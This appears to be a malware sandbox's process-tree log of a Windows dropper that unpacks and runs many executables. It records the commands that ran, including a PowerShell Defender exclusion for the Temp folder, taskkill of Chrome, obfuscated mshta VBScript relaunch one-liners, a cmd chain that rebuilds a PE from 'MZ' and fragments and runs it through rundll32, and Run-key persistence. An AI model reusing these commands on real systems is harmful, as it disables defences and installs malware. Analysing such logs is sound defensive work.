C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Loads dropped DLL
PID:856 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1292 -
C:\Users\Admin\Pictures\Adobe Films\rax9AAxU1FbeVTLaejxkPI3X.exe"C:\Users\Admin\Pictures\Adobe Films\rax9AAxU1FbeVTLaejxkPI3X.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 15206⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Loads dropped DLL
PID:316 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1240 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu16205451b994.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu16205451b994.exe" & exit6⤵PID:1628
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu16205451b994.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Loads dropped DLL
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2004 -
C:\Users\Admin\AppData\Roaming\8982011.scr"C:\Users\Admin\AppData\Roaming\8982011.scr" /S6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Users\Admin\AppData\Roaming\4731061.scr"C:\Users\Admin\AppData\Roaming\4731061.scr" /S6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1756 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2320
-
-
-
C:\Users\Admin\AppData\Roaming\8114232.scr"C:\Users\Admin\AppData\Roaming\8114232.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
C:\Users\Admin\AppData\Roaming\6854159.scr"C:\Users\Admin\AppData\Roaming\6854159.scr" /S6⤵
- Executes dropped EXE
PID:2144
-
-
C:\Users\Admin\AppData\Roaming\3674430.scr"C:\Users\Admin\AppData\Roaming\3674430.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Loads dropped DLL
PID:620 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:340 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2560
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Loads dropped DLL
PID:1380 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 9646⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵PID:1660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Loads dropped DLL
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu16f584bd3686.exeThu16f584bd3686.exe5⤵
- Executes dropped EXE
PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
- Loads dropped DLL
PID:864 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
PID:1492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
- Loads dropped DLL
PID:1948 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:2900 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:2988
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"7⤵
- Loads dropped DLL
PID:2316 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2336 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
- Modifies Internet Explorer settings
PID:1128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:2560
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:2940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:2124
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:2928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:2356
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:2920
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
- Loads dropped DLL
PID:2084 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:2848
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
- Loads dropped DLL
PID:1468
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
- Loads dropped DLL
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\7zS0876ED05\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:464
-
-
-
-